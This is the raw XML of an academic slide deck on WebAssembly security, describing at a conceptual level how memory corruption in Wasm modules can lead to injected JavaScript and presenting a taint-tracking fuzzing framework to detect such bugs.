              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>finally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client-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everyday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>internet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splitting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memory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320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3F5F-0C6D-DEDA-939D-868A0094D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BC332B8-01CB-EEAC-7F31-96D46307D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895942-4761-840A-9063-AFC7B5120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41E998-ADC5-04A0-5656-D878A828C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85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AutoCAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Google Earth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Photoshop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Twitch / Amazon IVS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Zoom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00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EFFAE-6586-FE22-FD04-9C44BDB5F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80C460-08B1-1921-77F1-C1663C137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85BBF3-7186-221A-144E-10049A1CA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Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is designed with an emphasizes on security, and many commonly deployed security mechanisms are not necessary.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a typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>For instance, DEP which prevents the execution of injected code, is not necessary because code is immutable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>By design, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> module cannot  arbitrarily access critical data from the host, such as the return addresses. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt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a typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>are by design inaccessible (stack canaries unnecessary)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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Finally, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Raondomization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> which makes it harder for attackers to exploit memory errors, is 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Not needed because of CFI. CFI enforces a specific order of execution inside the program </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> modules come with this by default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However, memory errors do not vanish and are still an issue.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68299-AD4B-0D80-0639-30C189493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46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return to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cutecats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> app, which the developer has extended with an image registry.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>this external input data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which can be anything, video streams, audio streams, and so on from 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users can now share their picture with other users. These users visit the website and then a random image of this image registry is displayed.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We see, that the webapp enables the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module to directly write to the HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This design is very popular and used in a lot of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebApps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, such as Twitch and Zoom, where the data comes from a server.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However, the attacker has now detected a buffer overflow in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker can now place the malicious code to abuse this bug into the image registry.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An user would now visit this website, and the payload is now injected into the victims </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because there is no randomization or guard pages, the attacker can reliably overwrite the data that is written into the DOM with malicious code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img_tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be written with arbitrary JS code, which give the attacker Remote Code Execution.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51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we know that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is popular but is vulnerable to memory corruption.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some research in this direction.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different approaches to detect bugs.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approaches fail to detect bugs because they only focus on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module itself but ignore the interaction with the host.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attacker-controlled data consumed by the module? How much does the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the data coming from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p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stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>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decode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CuteCats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works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;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analyze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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>thus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fuzzers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, do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coverage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Approaches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> also do not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>scale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Zoom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18k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> definite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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>The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do not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>know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18k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analyzed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fuzzers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>finds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>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,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>But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never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false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> positive.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35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6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automated reverse-engineering and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzzing framework for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-powered websites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Analyzes an attacker’s interaction interface with the target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>through taint-tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reveals what functions an attacker and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>what data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is controllable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embeds the analysis into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a coverage-guided snapshot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzzer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Instruments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> modules to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>detect memory corruption vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incorporates the state (i.e., the memory) of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function call to increase fuzzing coverage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatically generates test-driver code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297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gives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>attacker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vectors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10k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>domains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network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victims</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>module</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p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cutecats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>app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. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Around</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> 29,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>websites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an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>attacker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inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>malicious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victims</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>browser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Furthermore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2% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>sanitize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an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p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reliably</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>injected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FC68-7E98-4962-8BF7-8868440A953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88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65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07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7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1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8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0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FCA18F-B01B-1499-EB69-8BB54825A6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870141"/>
            <a:ext cx="10535325" cy="265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/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>lastname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> et al.,  conference year]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387189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518"/>
            <a:ext cx="10515600" cy="51976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7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22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9571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5649" y="6492874"/>
            <a:ext cx="4320702" cy="228601"/>
          </a:xfrm>
        </p:spPr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22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99126"/>
            <a:ext cx="5181600" cy="531090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9126"/>
            <a:ext cx="5181600" cy="531090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68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4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64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92874"/>
            <a:ext cx="2743200" cy="228601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr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000" y="90345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99134"/>
            <a:ext cx="10515600" cy="531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4"/>
            <a:ext cx="1856362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1008" y="6492874"/>
            <a:ext cx="5149985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Securing the Next-Generation Web: A Holistic Approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Vulnerabilities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2484" y="6492874"/>
            <a:ext cx="1441315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8F4C-E8C4-4CE3-AB98-635666EFA0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409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57" r:id="rId3"/>
    <p:sldLayoutId id="2147483758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freepngimg.com/icon/1000313-devil-emoji-%5bdownload-iphone-emojis%5d-free-icon-hq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ebAssembl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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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50.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image470.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId9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utpaqp.edu.pe/explore/computer-server-logo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egomariano.com/introducao-ao-node-js/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/WebAssembly" TargetMode="Externa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onarchive.com/show/fluentui-emoji-flat-icons-by-microsoft/Smiling-Face-With-Sunglasses-Flat-icon.html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pngimg.com/png/63843-thank-discord-media-thought-social-think-emoji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s://en.wikipedia.org/wiki/WebAssembl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WebAssembly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pt/logotipo-html-html5-%C3%ADcone-258274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diegomariano.com/introducao-ao-node-js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hyperlink" Target="https://www.publicdomainpictures.net/view-image.php?image=87454&amp;picture=&amp;jazyk=EN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24.png"/><Relationship Id="rId1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image" Target="../media/image49.sv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1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4.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.svg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.publicdomainpictures.net/view-image.php?image=87454&amp;picture=&amp;jazyk=EN" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/WebAssembly" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://foto.wuestenigel.com/katze-und-maus-spielzeug-mit-fernbedienung/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freepngimg.com/icon/1000313-devil-emoji-%5bdownload-iphone-emojis%5d-free-icon-h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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/WebAssembly" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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5.sv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hyperlink" Target="https://en.wikipedia.org/wiki/WebAssembly" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ar.inspiredpencil.com/pictures-2023/cute-baby-cat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58.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image730.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId9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hyperlink" Target="https://www.pngall.com/zoom-logo-pn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ncwebbing.blogspot.com/2011/09/utilizzare-camera-raw.html" TargetMode="Externa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hyperlink" Target="https://kanonxkanon.tistory.com/6493" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gamerauntsia.eus/bloga/euskara-twitch-eskakizuna/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId19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freepngimg.com/png/66921-logo-search-google-play-free-png-hq" TargetMode="External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ebAssembly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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/pt/logotipo-html-html5-%C3%ADcone-2582748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iegomariano.com/introducao-ao-node-js/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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hyperlink" Target="https://freepngimg.com/icon/1000313-devil-emoji-%5bdownload-iphone-emojis%5d-free-icon-hq" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId19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hyperlink" Target="https://en.wikipedia.org/wiki/WebAssembly" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.publicdomainpictures.net/view-image.php?image=87454&amp;picture=&amp;jazyk=E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87454&amp;picture=&amp;jazyk=EN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32.jpe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WebAssembly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31.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.publicdomainpictures.net/en/view-image.php?image=170317&amp;picture=beautiful-cat" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://diegomariano.com/introducao-ao-node-js/" TargetMode="Externa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5990BC4-7566-4BEB-513F-EA974072C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36" y="613079"/>
            <a:ext cx="11905488" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing the Next-Generation Web</a:t>
            </a:r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08675E92-5D98-C1B4-E9F6-C9B6888B5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0" y="3277949"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Holistic Approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebAssembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Vulnerabilities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AE00AB8-EAEA-E01A-B5F9-FEA7BA0F9859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4338620" y="4714848"/>
            <a:ext cx="357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Oussama Draissi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8A6EF59-FA3F-1E10-1390-FD4A184471B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9187022" y="6252243"/>
            <a:ext cx="289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oussama.draissi@uni-due.de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17CB55-3CD4-EB8A-09C7-5953F4CA392B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77899" y="6252243"/>
            <a:ext cx="285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University of Duisburg-Essen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2723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BA8E94E-0908-6B71-FC54-5A7B30713B4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="386439" y="1409792"/>
            <a:ext cx="3472010" cy="1665066"/>
            <a:chOff x="386439" y="1409792"/>
            <a:chExt cx="3472010" cy="1665066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43F7695-EEFC-DA2B-B4BD-E8E5D49EDE8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="386439" y="1409792"/>
              <a:ext cx="3472010" cy="1665066"/>
              <a:chOff x="1119753" y="1384945"/>
              <a:chExt cx="3222730" cy="1391128"/>
            </a:xfrm>
          </p:grpSpPr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EB9A5619-1847-7B3C-EC33-76A0E9A5455D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1119753" y="1384945"/>
                <a:ext cx="3222730" cy="1391128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E478F40-578D-FC82-6948-4BE1FAD51D7D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1508678" y="1405424"/>
                <a:ext cx="2444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/>
                  <a:t>External input data</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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B9ED811-6C31-F4DD-8DFD-843488067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421" y="2022937"/>
              <a:ext cx="736777" cy="860554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93944904-52E7-3E04-4B7D-1003AE59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New </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" err="1"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" err="1"/>
              <a:t>Vectors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A4FFD9-CEE6-3A13-6433-04DEB525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AA50B3-1D99-731E-E48A-AC1FB22F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124EF3-7447-CDF0-819F-C934A2F8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F50E4FD-293D-471C-665E-37A703CFB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91452"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5513192" y="1010813"/>
          <a:ext cx="6289390" cy="5079438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4043829">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2392041923"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2245561">
